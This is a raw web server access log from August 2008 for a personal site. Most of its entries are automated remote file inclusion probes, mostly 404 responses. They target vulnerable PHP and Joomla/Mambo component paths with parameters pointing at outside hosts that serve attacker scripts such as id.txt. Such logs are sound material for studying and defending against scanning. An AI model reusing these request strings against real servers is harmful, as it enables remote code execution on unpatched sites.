216.236.255.134 - - [03/Aug/2008:23:41:01 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
190.54.62.66 - - [03/Aug/2008:23:42:37 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
210.146.46.3 - - [03/Aug/2008:23:43:39 -0700] "GET /logs/access.log//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.aliirwin.com"
210.146.46.3 - - [03/Aug/2008:23:43:40 -0700] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.aliirwin.com"
210.146.46.3 - - [03/Aug/2008:23:43:42 -0700] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.aliirwin.com"
81.25.54.205 - - [03/Aug/2008:23:50:06 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.aliirwin.com"
81.25.54.205 - - [03/Aug/2008:23:50:40 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.aliirwin.com"
81.25.54.205 - - [03/Aug/2008:23:50:45 -0700] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.archfuck.ru/administrator/components/com_remository/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.aliirwin.com"
74.6.18.244 - - [03/Aug/2008:23:51:43 -0700] "GET /logs/access.log HTTP/1.0" 200 101615 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.aliirwin.com"
216.236.255.134 - - [03/Aug/2008:23:52:53 -0700] "GET //contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
66.90.73.113 - - [04/Aug/2008:00:11:21 -0700] "GET /logs/access_080519.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
66.90.73.113 - - [04/Aug/2008:00:11:26 -0700] "GET /errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
66.90.73.113 - - [04/Aug/2008:00:11:26 -0700] "GET /logs/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
195.39.5.203 - - [04/Aug/2008:00:11:51 -0700] "GET /logs/access_080519.log/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
195.39.5.203 - - [04/Aug/2008:00:11:52 -0700] "GET /errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
195.39.5.203 - - [04/Aug/2008:00:11:53 -0700] "GET /logs/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
66.90.73.113 - - [04/Aug/2008:00:14:55 -0700] "GET /logs/access_080609.log/errors.php?error=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
195.39.5.203 - - [04/Aug/2008:00:15:52 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
195.39.5.203 - - [04/Aug/2008:00:16:28 -0700] "GET /logs/access_080519.log/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
195.39.5.203 - - [04/Aug/2008:00:16:32 -0700] "GET /errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
195.39.5.203 - - [04/Aug/2008:00:16:33 -0700] "GET /logs/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
67.195.37.114 - - [04/Aug/2008:00:16:56 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.aliirwin.com"
67.195.37.114 - - [04/Aug/2008:00:17:44 -0700] "GET /logs/access.log HTTP/1.0" 200 104451 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.aliirwin.com"
74.6.18.244 - - [04/Aug/2008:00:18:16 -0700] "GET /?D=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.aliirwin.com"
195.39.5.203 - - [04/Aug/2008:00:20:43 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
66.90.73.113 - - [04/Aug/2008:00:24:34 -0700] "GET /logs/access_080623.log//Neos_Chronos/header.php?base_folder=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
216.236.255.134 - - [04/Aug/2008:00:29:27 -0700] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
62.244.71.72 - - [04/Aug/2008:00:47:54 -0700] "GET /logs/access_080526.log//xt_conteudo//admin/spaw/errors.php?error=http://aaa-hack.fateback.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.aliirwin.com"
62.244.71.72 - - [04/Aug/2008:00:47:54 -0700] "GET //xt_conteudo//admin/spaw/errors.php?error=http://aaa-hack.fateback.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.aliirwin.com"
62.244.71.72 - - [04/Aug/2008:00:47:54 -0700] "GET /logs//xt_conteudo//admin/spaw/errors.php?error=http://aaa-hack.fateback.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.aliirwin.com"
82.177.58.11 - - [04/Aug/2008:00:54:44 -0700] "GET /logs//xt_conteudo//admin/spaw/errors.php?error=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.aliirwin.com"
82.177.58.11 - - [04/Aug/2008:00:54:45 -0700] "GET //xt_conteudo//admin/spaw/errors.php?error=http://www.apnic.net/index.html? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.aliirwin.com"
66.90.73.113 - - [04/Aug/2008:01:05:40 -0700] "GET /logs/access.log///?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
216.236.255.134 - - [04/Aug/2008:01:05:44 -0700] "GET //?path%5Bdocroot%5D=http://www.askafriend.com/bookmarks/logs/safe.txt? HTTP/1.1" 200 779 "-" "libwww-perl/5.810" "www.aliirwin.com"
66.90.73.113 - - [04/Aug/2008:01:05:45 -0700] "GET ///?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 200 780 "-" "libwww-perl/5.813" "www.aliirwin.com"
66.90.73.113 - - [04/Aug/2008:01:05:47 -0700] "GET /logs///?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 200 1802 "-" "libwww-perl/5.813" "www.aliirwin.com"
81.0.228.184 - - [04/Aug/2008:01:09:43 -0700] "GET /logs/access_080526.log//xt_conteudo//admin/spaw/errors.php?error=http://aaa-hack.fateback.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
81.0.228.184 - - [04/Aug/2008:01:09:44 -0700] "GET //xt_conteudo//admin/spaw/errors.php?error=http://aaa-hack.fateback.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
81.0.228.184 - - [04/Aug/2008:01:09:45 -0700] "GET /logs//xt_conteudo//admin/spaw/errors.php?error=http://aaa-hack.fateback.com/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
190.54.62.66 - - [04/Aug/2008:01:16:13 -0700] "GET /logs/access_080526.log/home.php?pagina=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
190.54.62.66 - - [04/Aug/2008:01:16:14 -0700] "GET /home.php?pagina=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
190.54.62.66 - - [04/Aug/2008:01:16:15 -0700] "GET /logs/home.php?pagina=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
190.54.62.66 - - [04/Aug/2008:01:17:59 -0700] "GET /home.php?pagina=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
190.54.62.66 - - [04/Aug/2008:01:18:43 -0700] "GET /logs/access_080519.log/home.php?pagina=http://h-pro.ru/lang/inc? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
66.90.73.113 - - [04/Aug/2008:01:23:32 -0700] "GET /logs/access_080519.log//Neos_Chronos/header.php?base_folder=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
67.210.96.142 - - [04/Aug/2008:01:35:12 -0700] "GET /logs/index.php?function=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.aliirwin.com"
67.210.96.142 - - [04/Aug/2008:01:35:13 -0700] "GET /index.php?function=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.aliirwin.com"
58.176.30.104 - - [04/Aug/2008:01:35:29 -0700] "GET /blog HTTP/1.1" 404 275 "-" "-" "www.aliirwin.com"
58.176.30.104 - - [04/Aug/2008:01:35:38 -0700] "GET /blog/2006/07/27/well HTTP/1.1" 404 275 "-" "-" "www.aliirwin.com"
58.176.30.104 - - [04/Aug/2008:01:35:39 -0700] "GET /blog/2006/07/27/tonights-the-night HTTP/1.1" 404 275 "-" "-" "www.aliirwin.com"
67.210.96.142 - - [04/Aug/2008:01:36:13 -0700] "GET /index.pahp?url=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.aliirwin.com"
67.210.96.142 - - [04/Aug/2008:01:36:13 -0700] "GET /logs/index.pahp?url=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.aliirwin.com"
80.93.56.80 - - [04/Aug/2008:01:36:25 -0700] "GET /modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.degreeoferror.com/comics/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.aliirwin.com"
66.90.73.113 - - [04/Aug/2008:01:38:49 -0700] "GET /logs/access_080519.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://anakbugis.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.aliirwin.com"
216.246.78.8 - - [04/Aug/2008:01:52:06 -0700] "GET /logs/phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.aliirwin.com"
216.246.78.8 - - [04/Aug/2008:01:52:06 -0700] "GET /phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.aliirwin.com"
67.210.96.142 - - [04/Aug/2008:02:03:14 -0700] "GET /logs//contenido/conlib/local.php?cfg[path][contenido]=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.aliirwin.com"
67.210.96.142 - - [04/Aug/2008:02:03:14 -0700] "GET //contenido/conlib/local.php?cfg[path][contenido]=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.aliirwin.com"
216.246.78.8 - - [04/Aug/2008:02:06:00 -0700] "GET /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.aliirwin.com"
216.246.78.8 - - [04/Aug/2008:02:06:00 -0700] "GET /logs/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.aliirwin.com"
67.210.96.142 - - [04/Aug/2008:02:07:06 -0700] "GET /includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.aliirwin.com"
67.210.96.142 - - [04/Aug/2008:02:07:06 -0700] "GET /logs/includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.brazebo.it/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.aliirwin.com"
74.6.18.244 - - [04/Aug/2008:02:27:26 -0700] "GET /?D=D HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.aliirwin.com"
70.88.226.121 - - [04/Aug/2008:02:28:07 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
74.53.39.34 - - [04/Aug/2008:02:36:36 -0700] "GET /logs/access_080602.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
74.53.39.34 - - [04/Aug/2008:02:36:36 -0700] "GET /administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
74.53.39.34 - - [04/Aug/2008:02:36:36 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
74.53.39.34 - - [04/Aug/2008:02:36:39 -0700] "GET /logs/access_080609.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://mystjohn.org/calendar/docs/_vti_cnf/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
195.94.90.25 - - [04/Aug/2008:02:38:13 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.yavuzselimlisesi.com/components/com_kanbankasi/language/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
217.172.161.101 - - [04/Aug/2008:03:00:09 -0700] "GET /errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.aliirwin.com"
70.88.226.121 - - [04/Aug/2008:03:00:35 -0700] "GET /logs/access_080602.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
70.88.226.121 - - [04/Aug/2008:03:00:35 -0700] "GET /logs/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
70.88.226.121 - - [04/Aug/2008:03:00:37 -0700] "GET /logs/access_080609.log/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=http://www.richandrowdyretirement.com/rss.php/index.php/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
62.231.161.4 - - [04/Aug/2008:03:01:55 -0700] "GET /logs/access_080519.log/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.aliirwin.com"
62.231.161.4 - - [04/Aug/2008:03:01:56 -0700] "GET /errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.aliirwin.com"
62.231.161.4 - - [04/Aug/2008:03:01:56 -0700] "GET /logs/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.aliirwin.com"
89.111.172.23 - - [04/Aug/2008:03:07:09 -0700] "GET /errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
213.236.10.71 - - [04/Aug/2008:03:31:10 -0700] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.toxiii.com/includes/includes/m???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.aliirwin.com"
213.236.10.71 - - [04/Aug/2008:03:31:11 -0700] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.toxiii.com/includes/includes/m???? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.aliirwin.com"
217.172.161.101 - - [04/Aug/2008:03:31:39 -0700] "GET /logs/access_080616.log/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.aliirwin.com"
217.172.161.101 - - [04/Aug/2008:03:31:39 -0700] "GET /logs/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.aliirwin.com"
62.141.56.49 - - [04/Aug/2008:03:44:23 -0700] "GET //skin/zero_vote/error.php?dir=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.aliirwin.com"
62.141.56.49 - - [04/Aug/2008:03:44:23 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.aliirwin.com"
66.80.93.168 - - [04/Aug/2008:03:47:01 -0700] "GET //administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.aliirwin.com"
66.80.93.168 - - [04/Aug/2008:03:47:01 -0700] "GET /logs/access_080526.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.aliirwin.com"
66.80.93.168 - - [04/Aug/2008:03:47:01 -0700] "GET /logs//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.aliirwin.com"
66.80.93.168 - - [04/Aug/2008:03:47:01 -0700] "GET /logs/access_080609.log//administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.handowire.com/bbs/Paddy/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.aliirwin.com"
89.111.172.23 - - [04/Aug/2008:03:52:38 -0700] "GET /logs/access_080519.log/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
89.111.172.23 - - [04/Aug/2008:03:52:38 -0700] "GET /logs/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
89.111.172.23 - - [04/Aug/2008:03:53:24 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.alphalai.com/plugins/payment/secpay/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
74.55.113.226 - - [04/Aug/2008:03:54:29 -0700] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.mamolar.com/~reloj/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
193.178.118.47 - - [04/Aug/2008:03:54:50 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
193.178.118.47 - - [04/Aug/2008:03:54:50 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
193.178.118.47 - - [04/Aug/2008:03:54:50 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://customsbroker.ru//linki/files/contrD.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.aliirwin.com"
74.50.7.240 - - [04/Aug/2008:03:56:08 -0700] "GET /logs/access.log///vwar/backup/errors.php?error=http://r0xcrash.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
74.50.7.240 - - [04/Aug/2008:03:56:08 -0700] "GET ///vwar/backup/errors.php?error=http://r0xcrash.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
74.50.7.240 - - [04/Aug/2008:03:56:08 -0700] "GET /logs///vwar/backup/errors.php?error=http://r0xcrash.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
193.47.80.77 - - [04/Aug/2008:03:57:57 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.6) Gecko/20070821 BonEcho/2.0.0.6" "www.aliirwin.com"
74.53.152.210 - - [04/Aug/2008:04:06:41 -0700] "GET /index.php?pageurl=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.aliirwin.com"
74.53.152.210 - - [04/Aug/2008:04:06:41 -0700] "GET /logs/access_080623.log/index.php?pageurl=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.aliirwin.com"
74.53.152.210 - - [04/Aug/2008:04:06:41 -0700] "GET /logs/index.php?pageurl=http://museo.infoitos.com//components/com_rwcards/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.aliirwin.com"
87.230.35.101 - - [04/Aug/2008:04:08:21 -0700] "GET //skin/zero_vote/error.php?dir=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.aliirwin.com"
87.230.35.101 - - [04/Aug/2008:04:08:22 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.aliirwin.com"
81.169.158.65 - - [04/Aug/2008:04:14:15 -0700] "GET /logs/access.log/administrator/components/com_extcalendar/errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.aliirwin.com"
81.169.158.65 - - [04/Aug/2008:04:14:16 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.aliirwin.com"
81.169.158.65 - - [04/Aug/2008:04:14:23 -0700] "GET /logs/access.log/administrator/components/com_extcalendar/errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.aliirwin.com"
81.169.158.65 - - [04/Aug/2008:04:14:24 -0700] "GET /administrator/components/com_extcalendar/errors.php?error=http://www.kazumuzejs.lv/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.aliirwin.com"
74.50.7.240 - - [04/Aug/2008:04:14:59 -0700] "GET /logs/access.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://r0xcrash.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
74.50.7.240 - - [04/Aug/2008:04:15:00 -0700] "GET //s_loadenv.inc.php?DOCUMENT_ROOT=http://r0xcrash.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
74.50.7.240 - - [04/Aug/2008:04:15:00 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://r0xcrash.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
62.141.56.49 - - [04/Aug/2008:04:19:59 -0700] "GET //addons/guildbank/searcharrays.php?addonDir=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.aliirwin.com"
62.141.56.49 - - [04/Aug/2008:04:19:59 -0700] "GET /logs//addons/guildbank/searcharrays.php?addonDir=http://hortus-alere.dyndns.org/Home/components/com_frontpage/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.aliirwin.com"
194.79.75.195 - - [04/Aug/2008:04:20:14 -0700] "GET /logs/access_080609.log/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
194.79.75.195 - - [04/Aug/2008:04:20:14 -0700] "GET /errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
194.79.75.195 - - [04/Aug/2008:04:20:14 -0700] "GET /logs/errors.php?error=http://www.geocities.com/arabheck/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.aliirwin.com"
72.232.196.106 - - [04/Aug/2008:04:22:38 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.csccog.org/mambots/system/.bash/did.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.aliirwin.com"
